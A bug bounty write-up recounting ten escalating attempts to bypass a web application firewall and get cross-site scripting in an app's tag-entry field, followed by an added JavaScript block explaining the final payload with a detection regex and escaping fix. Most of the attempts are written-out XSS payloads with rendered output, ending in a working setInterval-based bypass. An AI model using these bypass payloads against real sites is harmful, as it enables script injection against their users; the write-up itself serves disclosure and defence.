JUMPING INTO HELL WITH 10 ATTEMPTS TO BYPASS THE DEVIL'S WAF:

This is a quick write-up of a WAF bypass on a private bug bounty program (BBP), so I will keep the program's name hidden.

Looking around in the app, I found a tag-entry feature that caught my attention:

So the app basically loads a tag item. I started with this:

### FIRST ATTEMPT

injection: "=""'><details open="">
output is:
<span>"=""'&gt;&lt;details open=""&gt; (0)</span>

Nothing…

### SECOND ATTEMPT

injection: "=""'></><details open="">
output is:
<span>"=""'&gt;&lt;/&gt;&lt;details open=""&gt; (0)</span>

Nothing…

### THIRD ATTEMPT

injection: "=""'></><script></script><details open="">
output is:
<span>"=""'&gt;<details open="…" (0)<="" span=""><a href="" class="" rel="1"></a></details></span>

Bam! We got HTML INJECTION!

NOW … GOING FOR THE PRECIOUS XSS…

### FOURTH ATTEMPT

I swapped the details tag for svg.

injection: "=""'></><script></script><svg onload=alert(1)>
output is:
<span>"=""'&gt;<svg onload="al…" (1)=""> </svg></span>

Strange? Yes.. like hell.. with those ugly dots in the DOM too… (the tag works fine, as shown above with the details tag)

But no popup :(

### FIFTH ATTEMPT

injection: "=""'></><script></script><svg onload"="alert(1)>
output is:
<svg onload"="… (1)> </span><a href=" "="" class="" rel="1"></svg>

WTF? Are you kidding me?

Wat?

OK, ugly motherfucker… now this is personal..

### SIXTH ATTEMPT

injection: "=""'></><script></script><svg onload"=""alertonload=alert(1)"">
output is:
<span>"=""'&gt;<svg onload"="… (1)" "=""> </svg></span>

OK, I give up.. this is not working..

### SEVENTH ATTEMPT

injection: " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt(1)>
output is:
onload="prompt</span"><a href="" class="" rel="0"></a></svg></span>

Oh nice shit! I'm closer.. I can feel it..

I can feel your energy.. ak1t4..

### EIGHTH ATTEMPT

injection: " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt`1`>
output is:
<svg onload"…="" (1)""="" onload="prompt`1`"> </svg> :)

BOOM! WE GOT XSS!

OK.. NOW TRY WITH document.domain:

### NINTH ATTEMPT

injection: " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=prompt`document.domain`>
output is:
<svg onload"…="" (1)""="" onload="prompt`document.domain`"> </svg> :(

WTF? The sticky shits are taking the input as a string…

Mmm, IT IS TIME TO CALL A REAL JEDI: MASTER BRUTE COMES TO THE RESCUE AND BRINGS BALANCE TO THE FORCE..

So I asked him how to inject document.domain over the sticky shits `1`;

His reply was:

### FINAL ATTEMPT with the magic touch of master brute :)

injection: " ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval`alert\x28document.domain\x29`

BOOM BABY!
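Added example (JavaScript, not code from the original post or from the target app): it shows what the backtick call hands to the sink, which is why the ninth attempt displayed the literal text while the final one ran code, plus the check and the consistent output encoding a defender would want; `captureTag`, `usesTimerTagCall`, `renderTagSafely` and the sample payload string are assumptions made for this demonstration.

```javascript
// Added example, not code from the original post or from the target app.
// A tagged template call  f`text`  invokes f(strings), where strings[0] is
// the *cooked* text (escapes such as \x28 already decoded) and strings.raw[0]
// is the text as typed. prompt coerces that array to a string and just shows
// it, so prompt`document.domain` displays the words "document.domain".
// A browser's setInterval coerces a non-function argument to a string and
// evaluates it as code, which CSP blocks when script-src omits 'unsafe-eval'.

// Stand-in sink that records what a tag function receives.
function captureTag(strings) {
  return { cooked: strings[0], raw: strings.raw[0], coerced: String(strings) };
}

// The template text from the post's final and ninth attempts, tag swapped.
function finalPayloadArgument() {
  return captureTag`alert\x28document.domain\x29`;
}
function ninthPayloadArgument() {
  return captureTag`document.domain`;
}

// Detection: reflected input that calls a string-evaluating timer as a tag.
const TIMER_TAG_CALL = /\b(setTimeout|setInterval)\s*`/;
function usesTimerTagCall(input) {
  return TIMER_TAG_CALL.test(input);
}

// Mitigation: encode the reflected value for element text every time, rather
// than losing the encoding once a <script></script> pair is present, as the
// app appeared to do from the third attempt onward.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Constructed sample: the post's final payload rendered with consistent encoding.
const FINAL_PAYLOAD =
  '" ="" \'></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval`alert\\x28document.domain\\x29`';
function renderTagSafely(value, count) {
  return `<span>${escapeHtml(value)} (${count})</span>`;
}
```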

*THANKS TO MASTER BRUTELOGIC FOR GUIDING ME TO THE FINAL DESTINY :)

XSS is not my field, so I feel like:

May the force be with you — happy hacking :)

P.S.: I'm not a coder; I hack by common and logical sense. All critiques are always welcome so I can improve. I hope you enjoyed this read as much as I enjoyed writing it.
